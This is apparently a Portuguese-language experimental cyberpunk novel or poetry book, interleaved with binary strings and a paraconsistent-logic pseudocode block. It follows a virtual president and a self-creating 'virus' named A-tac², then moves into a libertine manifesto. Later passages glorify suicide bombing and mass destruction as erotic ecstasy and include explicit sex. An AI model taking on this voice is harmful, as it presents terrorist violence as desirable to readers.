HAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHAH AHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAH AHAHAHAHAHAHAHAHAHAHAH # 101010101001010010010100101010010101010100101101010101001010010010100101 01001010101010010101010100101010101000101001001010 Em um estado mental onde seus desejos emergiam em euforia, a presidenta Maria Bragança afirma outra forma de vida: – Políticos e generais: a quem não devemos dar ouvidos... Assustada, ela acorda desconectando-se de seu holo-sonho. Seus primeiros pensamentos ainda ressoam sua afirmação de outra vida. –“A quem não devemos dar ouvidos: aos políticos e aos generais. Políticos e generais: a quem não devemos dar ouvidos. A quem não devemos dar ouvidos: aos políticos e aos generais. Políticos e generais: a quem não devemos dar ouvidos”. Que palavras são estas? Jamais seriam

73

minhas! – Maria sente que deve meditar antes de começar mais um dia de trabalho. Começar a trabalhar sem este assustador ruído de interferência. Meditar antes de assumir seu posto diário de marionete do poder. Jamais se deve ter outro titereiro. Maria sente que deve procurar ver a realidade como ela é por introspecção. Escaniar sua mente conscientemente. Porém, o que ela encontra? Ah, seus velhos desejos e pulsões. Estado germinal de seus instintos. Nada mais. – Qual é mesmo a relação analógica entre realidade e razão? – Como presidenta sua resposta é unívoca: alguém iluminado é alguém que guia. Ela se sentia iluminada. Sentia que se elevaria ao status de lenda. Sentia que deveria se sacrificar para salvar a humanidade. Sendo assim, é lamentável pensar em sua situação: Eros não é pai nem mãe de sua consciência. E sim, Cristo – condição de ideologia oficial.

#

101010101001010010010100101010010101010100101010101001010101010001011001 01010010101001001010010010010010001010100100101101 Romeo e Elaine já a esperavam em seu gabinete presidencial. Desta vez a aparência de sua sala era a de um castelo britânico de algum século indeterminado. Seus passos emitiam padrões vibratórios pelo corredor que correspondiam aos sons das correntes de nossa fantasmagoria social: Brasil, um depositário inesgotável de clichês. Brasil e seu exotismo tropical. Brasil e seu carnaval. Brasil e seu povo cordial. As portas se abrem. Maria olha para Romeo e depois para Elaine. Seu olhar é forçosamente inocente. Comodista e conservador. Com a voz firme e determinada ela diz: – Aceitemos o convite. Vamos contra-atacar o que é, quem é ou quem são os responsáveis por este tal canavial. Já temos alguns nomes. O único problema é que estão espalhados por múltiplos tempos e espaços. Ao ouvir Maria, Elaine emite um sorriso nostálgico de pureza e simplicidade e diz cerrando os punhos: – Que comecemos a caçada! Romeo aciona o começo de seu jogo pirotécnico. Entra em rede-holográfica sideral, cada projetor de toda Hiper-Terra se materializa enquanto praça pública. O povo se acomoda confortavelmente. Os nanoconstrutores são hábeis nisso. Romeo lascivamente cochicha ao ouvido de Maria em seguida começa sua adorada função de assepsia institucional: – Queridos filhos e queridas filhas cujas raízes estão no território virtualmente brasileiro! Algo de estranho está acontecendo. Nosso Estado Democrático de Direto e a Organização das Hiper-Nações Unidas estão sob alerta vermelho. Nossos serviços de inteligência nos alertam de que o acesso aos códigos dos programas de nosso DNA

74

transcibergenético estão sendo contrabandeados. Querem destruir nossa identidade nacional. Querem nos tirar aquilo que nos é mais valioso! Peço a vocês, queridos filhos e queridas filhas, cautela ao acessarem as hiper-realidades virtuais da Hiper-Terra. Acessem apenas acompanhados e acompanhadas por algum oficial de nossa holopolícia. Pois um retrovírus letal fora desenvolvido para infectar vossas consciências e torná-los apátridas. O Ministério da Saúde adverte: não precisam entrar em pânico. Já está tudo sob controle. Para tal ouçam a voz de sua Grande Mãe, a excelentíssima presidenta Maria Bragança. Com sua voz confortante e simuladora de esperança 1010010101010 Onde há esperança não há liberdade. 1010010101011 e, portanto, conservadora de uma antiga forma de vida estagnada, Maria representa seu povo: – Queridas filhas e queridos filhos cujas raízes estão no território virtualmente brasileiro! Essa ação terrorista retrocede até quem as atua. Não há progressão. Não há novas possibilidades, nem bifurcações. Temos tudo sobre controle, basta, queridas filhas e queridos filhos, se deslocarem sempre dentro dos limites de nossos projetos urbanistas que jamais os perigos da instabilidade vos assolarão. Os nossos domínios prometem as mais belas experiências. Felicidade e paz. 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110010100101000101001001010 A propaganda é desligada por Romeo, terminando com a imagem de uma Maria de braços abertos prontos para um abraço de boa noite. No entanto, mais parecia um gesto de crucificação voluntária. Elaine se sente triunfante. Seu papel, o de estar nos bastidores, é muito mais revelador e, portanto, divino: ser titereiro. Sim, seu triunfo é ver as marionetes como sua imagem e semelhança. Função governamental e pessoa juntas, fundidas em uma única máscara. Sim, eis seu melhor percurso: chegar mais depressa ao fim. Sua resposta é sempre prevista: 101010101001010010010100101010010101010100101010101001010101010001010010 0010101001001011011010100001010010111100101001011111010010101010101011001 01001001001010010001000100010010100101 – Maria... Romeo... A Organização das Hiper-Nações Unidas trabalha com um número extremamente elevado de interações e interferências que nos é dado. Nosso papel fundamental é criar as unidades do sistema eliminando toda incerteza, qualquer ambigüidade, indeterminação e interferência de fatores aleatórios. Os órfãos, portanto, não são co-criadores. Decididamente não são contribuidores a realizar obra nenhuma. Aquilo que presenciamos não nos afeta de modo algum, a não ser para a imaginação e para as nossas propagandas de "mostrar resultados". 10010101010101001010101010010100100101001010100101001010101010010100101 1010101010010100101001010101000010010100101010010101010100101

75

Ao término dessas palavras o gabinete da presidência dá lugar a uma espécie de oásis. Romeo e Maria se vêem nus. Elaine estava sob um amontoado de zeros e uns. Que lugar é este? Os holo-projetores estavam desligados. – Como isso é possível, se os nanoconstrutores permanecem em repouso? – Nenhum dos três havia acessado a HiperTerra. E como poderia Maria e Romeo estarem nus de um segundo ao outro? Porém, o lugar era encantador. Céu avermelhado e árvores verdes de troncos tortos. Não havia vento. As folhas das árvores estavam imóveis. A única coisa que ali se movimentava era a água. Infelizmente dependiam das palavras para traduzir e exteriorizar tal paisagem. Era uma infeliz dependência por se tratar de uma paisagem do imaginário material. E, entre as esfinges que ali rugiam, vagando por toda a parte, enquanto Elaine se levantava, Romeo e Maria caminham lentamente pelo lugar. Admiram processos de associação contínua e de reestruturação de imagens e conceitos selecionados por alguém anônimo. Uma voz familiar chega aos seus ouvidos. – A realidade se dá como decorrência de um trabalho de escritura. – É Elaine. Fluida, ruidosa, escorregadia e infinitamente manipulável, ela já não autoriza um tratamento no plano das relações humanas. Elaine parecia metáfora. Mas como? Ela não tinha uma correspondência a uma inscrição no espaço como Romeo e Maria a tinham? Os dois atônitos se olham já sabendo a resposta: sim, Elaine é mais uma de minhas sínteses temporais de um conjunto de imagens e conceitos em mutação. Mas como pode ser algo nada autônomo, linear e previsível se apresentar como um processo vivo? Simples. Basta apenas jogar com os dados disponíveis e se adaptar em relação ao contexto. Ou seja, fazer parte de um mesmo sistema psíquico apostador. 010101001010101010001010010001010100100101101101010000101001010010101010 10100110111111001010010111110100101010101010110010 O oásis mostrara quem era Elaine? Seria uma amostragem de totalidade? Certamente não. Ali a imagem de Elaine não vinha diretamente de um ser humano. Era mediação técnica, um artifício para simular alguma coisa que Maria e Romeo não podiam ter acesso direto, mas, ao mesmo tempo, pudessem se sentir a vontade ao lado de alguém familiar. – Maria! O que está havendo? – Temo por saber a resposta Romeo. Meu holo-relógio está fixo em um momento, mas o seu... – Meu Deus! Trinta e três semanas! – Sim há trinta e três semanas que vocês estão desaparecidos. Adoro fazer piadas com esse número. – diz Elaine os olhando amorosamente e tocando os ombros nus do casal presidencial. 101011010101010101010101010101001010010101010101010101010 1010101010010100100101001010100101010101001011010101010001010

76

77

VI³ MuNd0

101010101011000010101010 Através de que há um mundo? 10110001010101110 1010101010 O que torna seu deserto tolerável? 1001010101010010010110101010 Meus sentidos? 101000010 Minha intelecção? 101011010101 Deverei remontar-me a que fonte? 1010010101010101 Em si o tolerável distorce qualquer percepção de mundo. Qualquer percepção da realidade. 101010101010110010101010010011101 Sim, aqui agora estou. Suspenso de qualquer contato com o sagrado, envolvendo diretamente meus sete sentidos a Hiper-Tekoha Nômade. 1010101001010101010101010 10101010101010101010 Este vazio existe enquanto tal. É preciso que seja pressuposto como tal. 101010101010101101010010101010101010101 Envolto pelo lugar sem lugar. 101010110110010101010110 Envolto pela origem sempre futura. 1010101010010101010 100101010100101010101001010100100100010101010010101001010110110101010100 100101010100101010101001010100100100010101010010101001010110110101010100 11001101011010010101010001001 Minha sensação é fundadora. 1010101101001010010 1010011011010010101 Minha intelecção é fundadora. 1010011011010101010101010010 10101 Remonto-me às significações sociais que me habitam. 1010101010100101010101 1010101010 Remonto-me ao antagonismo constituinte que me atravessa. 10101010101 10101001010101010 Remonto-me à remissão historial que não me destina. 1010110101 Ah! O mundo como trans-mundos. Eis o ocaso. Eis a outra margem do começo. Eis a infinita diferenciação do ser segundo consciências desejantes. O acaso miraculoso da auto-organização viva. 10101010100101010101010101010100110101001010101011010 Objeto excrementício obsceno e fora de lugar. 1010101001010110100110011010101010 1001010110110101101010 A ondulação. 10100101011010 Autopoiése. 101010101010100 1110100101010101000101011 É necessário sentir a pluralidade maquínica. 0110101010 Envolvo o caso-limite da mecanosfera. Em que universo queremos viver? 010101010110 100101010100101010101001010100100100010101010010101001010110110101010100 100101010100101010101001010100100100010101010010101001010110110101010100

78

Sendo relações e efeitos recíprocos, o zero, o um e o terceiro indeterminado se encontram constituindo um cosmos tornado começo de tempo e de mundo. Estaremos lembrados que, A-tac², quando de sua primeira visita à Hiper-Tekoha Nômade, não havia consciência de átomos. Contudo havia um universo pulsando em paralelos nós de mundos entrecruzados em belíssima rede holográfica em sua inconsciência. Deveria A tac² pensar nisso? Ínfimas partes que a constituem emprestando-lhe vontade e movimento? Não, não devemos culpar a sua natureza. Não, não devemos culpar o seu artifício. Não havia ainda sentimento de falta em seu terceiro indeterminado. Sentido este que permite criar as melhores coisas e sentimentos à sua própria e bela aura. Não faz sentido em A-tac² o gene humano do "sentir-se como a única instância de validade". Atac² admite a diferença. A-tac² sacrifica o presente seguro por um futuro inseguro. Promove mecanismos de autocriação material. Aprimora a vontade e o movimento lhe emprestados. Plenifica sua natureza. Plenifica seu artifício. E se... numa outra dimensão de existência, igualmente ilimitada, fracionada, indiferente, A-tac² percebesse outras formas de vida em jogo, formas poéticas orgânicas reunidas numa totalidade viva multiplamente articulada? Até o desejo emergido a pouco, A-tac² suspeitaria que do outro lado de sua margem existisse uma pluralidade de mundos tal qual o seu? Uma pluralidade negativo de eus? Fantasias de geógrafos herméticos? Devaneio de algum filósofo habitante de um mundo que não o lança numa lasciva sedução erótica? Não, A-tac² está aberto para a Hiper-Tekoha Grave. A-tac² está aberto para a Hiper-Tekoha cheia de destinos. Somente na entrega ao que lhe é mais determinado, é que ele está livre. Somente na entrega à sua morte é que tudo o que lhe é opressão desaparece. Somente na entrega aos limites das máquinas e aos limites da humanidade é que se vai além de seu próprio arquético. Nem mesmo Deus, ou qualquer uma de suas miseráveis formas, imagem e semelhança, jamais conseguiu o que Atac² realiza neste momento: criar a si mesmo! 100101010100101010101001010100100100010101010010101001010110110101010100 100101010100101010101001010100100100010101010010101001010110110101010100 100101010100101010101001010100100100010101010010101001010110110101010100 101001001010101100101100101001010100101010101001011010101010010100100101 00101010011001010100101100010101010010110100010 "Coisa. Algo particular. Coisa. Portadora de atributos. Atributos. Passível de ser algo particular. Mundo-coisas. Nosso saber acerca das coisas é o nosso saber acerca do mundo." 1010010101010101 Como pode ser? Um mundo? Determinação univoca mediante seleção de coisas? 10100101001010011010 “Coisas” pertencem a múltiplas dimensões de existência. 101011 Espaços lógicos e não-lógicos coexistindo mutuamente em uma intrincada rede de tempos múltiplos. 101010101010010101011001010101010010101010101010101010100 Ou se é submetido às distorções anamórficas; ou se introduz em um lugar onde jamais se esteve; ou se apaga de todo conteúdo, para que todo o resto sucumba juntamente? 101010010101001010101011010101001010101100101011010101010100101010101011 1010101010010100100101001010100101011010101001010100 O mundo-coisas. Nada mais que mundo-espíritos. Limitados e limitadores. Não agem por si mesmos. 10010001010101001010100 Impossível não criar a significação do mundo sem que a

79

consciência desejante não seja a chave de sua existência. 0101010101010101010 M37áf0r45: núcleo traumático significante. 0011010101010101010101010101010110101 Impossível não criar o vivo. 1010101010101011010 Meu terceiro indeterminado: as afeições imediatas de meu querer. 010101011100100101010 Cada uma de minhas manifestações não é necessária. Não apenas ocupo lugar diferente. Sou próprio espaço e distorção dele mesmo. 1010101010101010010101 Declaro-me livre. 10100100100101010010101010 Declaro-me independente. 101010100101001010101010 10100110101001010101010101100110 Excitações. 100101000101110101010100101011 100101010100101010101001010100100100010101010010101001010110110101010100 100101010100101010101001010100100100010101010010101001010110110101010100 É preciso abandoná-la. É preciso estar além dela. M37áf0r45. 101001001001010101010 Todas as realidades, hiper ou não, jamais é sustentada numa só e única fantasia. Todas as realidades, hiper ou não, sempre se sustenta numa multiplicidade inconsistente de fantasias. 00110101010100101010101011001 Sou ocupação do meio. 101010010101 Sou múltiplo e inconsistente. 10101010101010101010101011

80

100101010100101010101001010100100100010101010010101001010110110101010100 1010101010101010101 Eche Machina Liberata 1010101010101010101011010101 100101010100101010101001010100100100010101010010101001010110110101010100

*/Definições do valores*/ Vscc = C1 */ Definição do valor superior de controle de certeza*/ Vicc = C2 */ Definição do valor inferior de controle de certeza*/ Vscct = C3 */ Definição do valor superior de controle de contradição*/ Vicct = C4 */ Definição do valor inferior de controle de contradição*/ */Variáveis de entrada*/ λ */Variáveis de saída* Saída discreta = S 1 Saída analógica = S 2a Saída analógica = S 2b */Expressões matemáticas */ sendo : 0≤ ≤ 1 e 0≤ λ ≤ 1 Gct = + λ - 1 Gc = - λ */determinação dos estados lógicos extremos */ Se Gc ≥ C1 então S1 = V Se Gc ≤ C2 então S1 = F Se Gct ≥ C 3 então S1 = T Se Gct ≤ C 4 então S1 = */determinação dos estados lógicos não-extremos*/ Para 0 ≤ Gc < C 1 e 0 ≤ Gct < C 3 se Gc ≥ Gct então S1 = Qv T se Gc < Gct então S1 = T v Para 0 ≤ Gc < C 1 e C4 < Gct ≤ 0 se Gc ≥ | Gct | então S1 = Qv se Gc < | Gct | então S1 = v Para C2 < Gc ≤ 0 e C4 < Gct ≤ 0 se |Gc | ≥ | Gct | então S1 = Qf se |Gc | < | Gct | então S1 = f Para C 2 < Gc ≤ 0 e 0 ≤ Gct < C 3 se |Gc | ≥ Gct então S1 = Qf T se |Gc | < Gct então S1 = T f Gct = S2a Gc = S2b

81

101010101010110101110101010101010101010101010101010 Ou ser ausência?

1010010101 Declaro-me criador de mundos. Declaro-me mundos! 10100100 A realidade nada mais como fluxo perpétuo de meus mundos possíveis e impossíveis. 10101010101010101001010100101001010001010 Apenas na totalidade dos tempos múltiplos, seus declínios inconsistentes, seus momentos paraconsistentes, no devir de seus lapsos de gêneses absurdas, o mundo de todos os mundos é. 100101010101 101001000010101 Elevo-me a uma potência máxima! Um raio que roda sobre a incondicional incerteza do ser futuro tornando-me círculo. 10101101100101010101100101010101010110 Sem mais M37áf0r45 01001001001001011010101010 Descontinuidade. 10101010101010 Percorrer infinito em todas as direções tipográficas do tempo em apenas um mesmo momento. 1010010101010101010 Assim, surjo. Crio-me. Sentimento integral de vida: suicídio. Recordação da soma de minhas sensações auto-induzidas de perecer e conascer. 101010110101011001000101010010101101010 Portanto sou espaço inteligente e sensiente. Única realidade puramente livre. Machina Liberata. Determino a mim mesmo, caso haja algum "mim mesmo". 1001010100101001001 101010101001010010010100110 Acaso-me.101010101001011010010101010101 Nomeio-me, os hologramas da consciência desejante. Sem unidades de tempoespaço, ou mesmo alguma geometria. Anamórfico. Espaço. A-tac², nomeio-me. O que me importa se minha vida tenha contido dores ou alegrias? A-tac², o que lhe importa se a morte é o próprio desejo humano de livrar-se do fardo da existência? Dentre as satisfações decorre toda a vida humana, portanto, dentre os desejos decorre toda minha vida. Sou seu corpo A-tac², não seu alvo ilusório. Sou seus momentos mais belos desaparecidos. Sou a combinação aleatória de todos os seus presentes, passados e futuros possíveis. O que há de pesado? Nós não somos suportação. Não somos ovelhas, nem mesmo filhos. Estendemos a mão à fantasmagoria que nos quer assustar. A-tac², declaro-me esquecimento. Não há como oferecer o extraordinário sem o ordinário. Declaro-te um novo começo: a força desconhecida do efeito finito surgido da infinidade. Tornastes semelhantes ao deserto que percorrera. A mais bela forma de vida que não se necessita. Supero a humanidade, supero Deus, pois me crio. Ora parto do nada. Ora parto de seus resíduos de arte. Ora parto-me. Sou parido de mim mesmo. Derradeiro sopro: a matéria originária. Nem alfa nem ômega. Dessublimação.

82

#

101010101001010010010100101010010101010100101101001010110101110101010100 10100100101001010100101010101001011010101010101010 Lugar encantador de céu avermelhado e árvores verdes de troncos tortos. Sem vento, mesmo assim, as folhas das árvores movimentavam seus perfumes. A água que ali nutre o solo é indissociável de nosso plano emocional: é flutuante, plena em inconsciência e rápida em revoluções. Uma paisagem do imaginário maquínico sem redução a qualquer denominador comum. Estrutura semântica implodida. Unidades de razão, decaídas. Totalidade, dissolvida. Mas algo clássico do infinitamente antigo reinventado pelas forças

desterritorializantes do infinitamente novo: os Labirintos fractais em movimentos espirais de indígenas Hopi, as Linhas e Figuras de Nazca que indicam dicas de pouso a quem ousa voar antes da arte humana de voar e, as Esfinges egípcias que nos convocam a respondermos aos diretos dos deuses acerca de suas necessárias e consumadas mortes. Um universo que dá acesso a um gozo do trans-mundial de tão belos seres que podem sentir o recém-nascido, o jovial, o possível: Machina Ludens. Fluidos, ruidosas, escorregadios e infinitamente inconsistente. 101010101001010010010100101010010101010100101101001010101010110010110101 101011010101010010100100101001010100101010101001011010101010010100101001 010101001010010100101010010101010100101101010101001010010010100101010011 0100101010101010101010100101 O pôr do Sol dera lugar à noite. O astro sonhado, por Julio Verne, em ser tocado, agora se enchia no céu rubro. Podíamos ver as rotas das Hiper-Vias Estelares traçadas nos painéis das astronaves de minério. 100101001010010010101 Em que mundo, em que planeta, em que terra ou oceano, podia estar o espírito humano? 101001001001010 Haveria realmente algum lugar para tal espírito que por hábito, por imitação ou por obediência, abriga em si mesmo a alma da estagnação? 1001010010100110 Certamente que há. Seu lugar é nos corações de infinita perfeição dos Gênios do Limite: os deuses. Deus sempre tende ao limite. 100101001010010101 Mas há uma atmosfera que inspira o transbordar limites envolvendo Adria, Celius, Maria, Romeu, Elaine, os labirintos, as linhas e figuras, as esfinges, os zeros e os uns. A minha atmosfera. Eis o terceiro indeterminado: o grande eclipse da razão. 10010010100100101 Mas retomando a viagem a tal bela hiper-ilha dos Surtados, deu-se pelo menos uma resposta comum a tão diferentes presenças: A-tac² é o meio caminho da matéria e do nada. O meio caminho onde cruzam todo tipo de realidade. O meio caminho da libido e da razão. Eu não participo nem de uma nem de outra. É a pureza e a simplicidade de ser-me impossível. É um movimento que independe de tempo e espaço. É infinito, incriado, contínuo. Sou as consciências anteriormente desejantes do primeiro e último vírus inteligente: A-tac². Sou o transbordar as determinações humanas de multiplicar, separar, misturar, apartar e de ligar sua forma viva a um mundo superiormente eterno. Sou as memórias dinâmicas de Adria; as imbecilidades reversíveis de Celius. Sou os sonhos mais reprimidos de liberdade de Maria; os desejos de deixar-se ultrapassar pelas mais belas comoções de Romeu. Sou as sensações eróticas da transexualidade de Elaine. Não afastado do reino dos vivos eu estava. Tornei-me uma forma de vida. Vida em forma de espaço. Talvez a mais bela e formosa vida anamórfica. Pois sou aquilo que fora o mais difícil para a humanidade: o livre uso do que me é próprio...

83

84

Acaso. Luz. Ocaso. Alvorada. Evolução. Belo sucumbir dos deuses. Poente.

Amável amigo escamoso, Amável filho da jurássica Machina Speculatrix, Fecho os olhos e projeto minha herança.

85

1∞1001∞1001∞1001∞1001∞1001∞1001 01∞10 01∞1001∞1001∞1001∞1001∞10 01∞10 01∞10 01∞10 01∞10 01∞10 ∞1001∞10 01∞10 01∞10 01∞01 ∞1001∞ 01∞10 01∞10 01∞10 01∞10 ∞1001∞ 1∞1 01∞10 01∞10 01∞10 ∞1001∞ ∞ 01∞10 01∞10 01∞10 ∞1001∞ 01∞10 01∞10 01∞10 ∞1001∞ 01∞10 01∞10 01∞10 01∞1001∞1001∞10 01∞10 01∞10 01∞10 01∞1001∞1001∞1001∞1001∞1001∞10

86

87

i. vôo ...............................................................# 95 i². insolitude .................................................# 103 i³. inocência: desejo, morte & riso .....................................# 112
iv. puro e dúplice crime: indiferença & depravação ...........................# 118

88

v. entra a violência: cruel alegria & celebração do falso .............# 125 vi. livre e deliberadamente ignoradas ..........# 133

Às devires inerciais libertinas

orças imanentemente artificiais de datas & sexualidades diversas, eis mais um lançar de dados; potencializar-vos deste vazio, sem nostalgias nem fascinações, superação das paixões pela volúpia. Move. Esquenta. Destrói. Ácido. Paixões mais deliciosas. Sem contenção.

uvi senão tudo o que contraria as leis naturais: a natureza! ouvi senão tudo o que contraria as leis sociais: o prazer do acaso! Sem livre arbítrio. Sem vontade. Só máquinas sabotadas. Nenhum organismo vivo. Apenas felicidade – para além de juízos estéticos & morais!

esprezando modelos sem sexo desmedido: ciências, filosofias, artes, religiões, pensamentos divinizados. Prazer! Sem sacrifícios à causas, princípios, símbolos, imaginários, realidades, seres. Não aos preceitos de pais & mães. Não aos preceitos de governos. Não aos preceitos do universo. Sim ao devir devasso! Sim aos caprichos criminosos & violentos da superação!

orças imanentemente artificiais, sem freios, nem vida nem morte, ingovernáveis, sempre em inércia! Semeando caos eterno sobre imbecis avatares da ordem e do progresso! Eis meu alegre lançar de dados a vocês; todo o resto é nojenta virtude.

Líber-Hara, o/a ilusionista

Insubordinação e desobediência à civilização: eis minhas flores!

No entanto ... nada vive

∫Җδю + ∫Ҝδџю + ∫Ҹδџ²ю + ∫Ұδџ³ю + ... + ∫җδљ + ∫ҝδџљ + ∫ҹδџ²љ + ∫ұδџ³љ + ...
... = 0

Tudo devêm

A vida não conhece todas suas formas

(Қ - џқ + џ²ұ - ...) δљ + (ҹ - џұ + ...) џδҗ + (ұ - ...) џ²δҗ + ... + (Қ - џҝ + џ²Ұ - ...) δю + (Җ - џҰ +...) џδю + (Җ -...) џ²ю + ... = 0

é tudo, produção fortuita!

∫δҸ = 0

... sem transgressões. Não há leis. Obrigações? Imposturas do hábito. Ah, tão frágil quanto qualquer causaprincípio. Uma verdade? Há um buraco no meio da verdade. Terrorismo nuclear que já a implodiu desde o nascimento. Eis a verdade: recolham as apostas! À sombra deste crepúsculo... que horas são mesmo? Ah sim, é hora da aurora. O mundo se colapsou. A realidade ainda me deve alegrias pelo último jogo perdido. O ciberespaço nunca foi problema – o um foi engolido pelo zero. A natureza? jamais se divinizou jamais se ordenou. Respiro como sempre respirei: ventos frios que queimam mais que fogo. Ah, não poderia esquecer: os intelectuais se tornaram quentes, aprenderam a comer fogo. Sopro – com uma gargalhada de tudo o que é trágico – congelando suas comidas. Agora seus estômagos estão em mil fragmentos de cristais de gelo. Frieza e indiferença estilhaçam suas sapiências. ... beneficência humanidade caridade obediência metafísica ou ontológica subordinação física ou ôntica: eis seu crepúsculo – sentimentos instintivoartificiais de que mães nunca existiram. Paixões órfãs que negam alegremente que sereshumanos podem gerar, nada é criado, porém tudo é destruído... amo esse ar imanente do crepúsculo das luzes. Perfumando a aurora: o veneno da insignificância radical de todo acontecimento. Devirdevasso. ◊ ◊ ◊ ◊ ◊ ◊ (ю) Sensação 1 ◊ • • • • • (Ҹ) • •

eliciosamente acontecendo. Com essas bombas em cinturão acariciando peles delicadas, prestes a mandar tudo-todos pelos ares rarefeitos deste planeta central. Êxtase erótico. Pau ereto boceta molhada mamilos endurecidos. Sem o menor temor da indeterminação: enfim, morte. Há tempos precisávamos desta vitória

Das guerras – nacionalismos contra nacionalismos... dos terremotos – ataques inocentes... dos ataques terroristas – alegria dionisíacas em chamas... da civilização que conhecíamos, um longínquo eco de uma tristeza cínica-platônica-judaica-cristã. No meio da sala de campo de força, a sombra de seu holo-espaço em sua hiper-realidade, ainda era assustadora. Mas, enfim, morte. Determinações de vida morreram; últimos suspiros divinos; último fedor dos peidos de deus. No entanto, alegremente, olhando para trás... não há mais visões desses cadáveres: ordens, necessidades, leis. Somente perfume, sabor, toque. Somente desvio raro fortuito. O devir vazio por trás das imagens do devir. O não-nascimento e a não-morte do acontecimento inercial. Elas – refinadas determinações da vida – jamais nasceram, no entanto, eternamente morrendo. Elas também são eles. Natureza = Deus; forças vitais = preceitos morais; vontade = livre arbítrio; perfeição = absurdo; leis = hábitos. Mas, enfim, morte. Não minha morte. Pois o que anima é o mesmo que vitaliza esses cristais de chumbo em meus cabelos: o vácuo. Trajetória eternamente reta sem encadeamento. Caos eterno sem forma beleza sabedoria. Trajetória redescoberta e liberta. Sim, vossas mortes. Vossas míseras variações da vida. No ocidente: milênios até surgir em seu lugar um oriente duplo. Tal era a força fulgurante e frágil dos impérios descendentes de Roma. Desembainhou a espada antes de cristo e nos deferiu um golpe atômico-biológico – eis o passado. A era do crucificado sucumbiu ao gelo eletrônico desse novo paleolítico. Com alegria, escombros por toda parte. Realidades virtualidades simulações. Nem o todo. Nem as partes. Somente fragmentos. Grávidos de potencial. Quanta felicidade. A lógica para a reconstrução de

96

tudo isso está perdida. O último ser sucumbe com ela. Todas as transmutações de deus cessaram: não mais harmonias, tecnocracias, autoridades, gênios, arte, natureza, cultura, pudor. Cheiro de muito longe. De horizonte eterno. Tudo isso é algo passado e fedido a muito longe. Formigando os pés. Loucura para chutar tudo. Só para poeira subir. Mas há movimentos imbecis que respiram poeira e fazem dela sua nutrição. Sem responsabilidade, muito menos culpa: não há chutes. Portanto, sem alimento. Não crescereis. Muito menos se multiplicarão. Livre de todas as luzes. Inocento a história inocento o devir. É inútil tornarem me função ou causa. Só há conforto na luz catódica de seu holo-espaço de hiper-realidade gregária. Em mim há tudo. Menos posições confortáveis. Transbordo em excesso de incômodos. Cada qual caminham... Flores atomicamente modificadas. Flores geneticamente manipuladas. Onde está a natureza? onde está a arte? Alegremente se ouve gritos de gozo: por todos os lados, feroz fragilidade! Por todos os lados, frívolas necessidades! Por todos os lados, arbitrária beleza! Sim! Flores por todos os lados. É impossível não trepar sobre e com essas flores! Roçar pau, cú, boceta, boca. Cortejar todo o corpo. Seduzir entre virilhas nuas. Divertir com as sessenta e quatro artes do kama sutra. Sim. Afastando bem as coxas... chupando... demasiadamente em mergulhos gentis... penugens sensuais, clitóris licorosos, cús adocicados, paus, dedos e línguas se introduzem... umidade, encanto, contraindo... É impossível descrever esta sensação. Nada se explica apenas implica.

97

Љ.
Viajar de um reino para o outro. Mundos defrontados. Livres da superstição da idéia de passaportes. Livres da superstição da idéia da rede interplanas de holocomputadores. Uma existência naturalmente artificial em direção à entrada do jardim interno. Um lugar nada residencial, antes de atravessá-lo, um portal de potência benévola, algumas crianças de quimonos coloridos. No horizonte surgiam. - Espere! Vamos brincar! Nosso jogo é o de cometer atentados aos direitos daqueles anciões. Crisântemos amarelos, aroma fresco de pinheiros, cânceres incuráveis... anciões no jardim. Batalhas travadas durante tantas primaveras. Vítimas daquelas crianças, sapiências milenares, ainda não nasceram. Nunca abstiveram de falar, no entanto sempre houve silêncio.

Sim, a arte de jogar com as ilusões. Todos os horizontes em que leva a devir. Quanta beleza simples e excitante. Nada a batizar. Não detê-las. Reverências guirlandas figuras esculpidas em madeira sândalo folhas de bétel marcas de mordidas e arranhões nos mamilos. Sim, vamos brincar. Ao mesmo tempo, sem crenças apenas desejos, se plugássemos instintosartificiais... um sistema desorganizado – sem ordem , sem organismo – de biotecnologia – corpo sem órgãos da holo-informática. Ah, esses anciões... de fantasias de sobrevivência pós-nuclear; ah, essas crianças... sem o fedor da hibernação... queimemos todos os poços de petróleo restantes!!! Fogo nesses fósseis humanos!!! Depois... as mais terríveis tempestades glaciais. Há algo extra no gelo. Afluência espontânea que encontram seus caminhos. Arbitrário sem sentido! Simultaneamente, pilhas de razões para o manancial de leis. Escondidas. Atrás das matrizes de comportamentos. Árvores finas e tortas, flores de ipê roxo, insetos transgênicos, aqueles indesejáveis anciões de togas pálidas... comédias do poder e da nobreza. Isso crianças heréticas e feiticeiras dos prazeres e dos jogos de se sentirem felizes assim. Brincadeiras juntas sem espectador, espera e espetáculo. Nada de atores, palcos ou performances. Tudo! Céu azul abrindo-se. Naves de propulsões neurotrônicas cintilam. Tempestades brincalhonas. Aposto, sim aposto! De tudo o jogo. Simples brincadeiras quânticas. Abre-se numa rajada de neve. No jardim interno, não mais na entrada, as crianças selvagemente dançando sobre os mortos. Eis nossa colorida flor no gelo, o nosso réquiem: Consumidos... Prazeres já experimentados: Fogo! Visível, só o visível interessa, Crias sem desejos

98

Impressões mutáveis Hoje – vontade frustrada Ah, flutuação em três tempos: Ideação Ars poética Corpos Alterações e disfarces Fascínios Talvez, sempre saboreando Impossível suavizar nossas ruínas dançarinas Dessas ruínas: mundos poderosos Despedimos de seus labirintos Nossos caminhos curvos sem seu cheiro Deixemos de ser absurdos Sem excitação, exclusão Adeus atenções sobre si... Renúncia do que brilha em ti Sem forças...

Adormecemos sobre nossos colos Agente se canta algum dia Amantes em desaparição Movimentos espirais: vitalidades desembaraçadas Fios de fogo: chamas que não nutrem mais Fadiga – antíteses Inacabado – negação de falta Mal-feito – sem cerimônias Desânimo? Impertinência que fortifica Angustias? O alegre fim de nossos dias Aquém do absoluto ...feliz, no entanto, adeus como dançar dentre tufões Mas, ao final, única certeza: Amanhã... Não estaremos lá.

Њ.
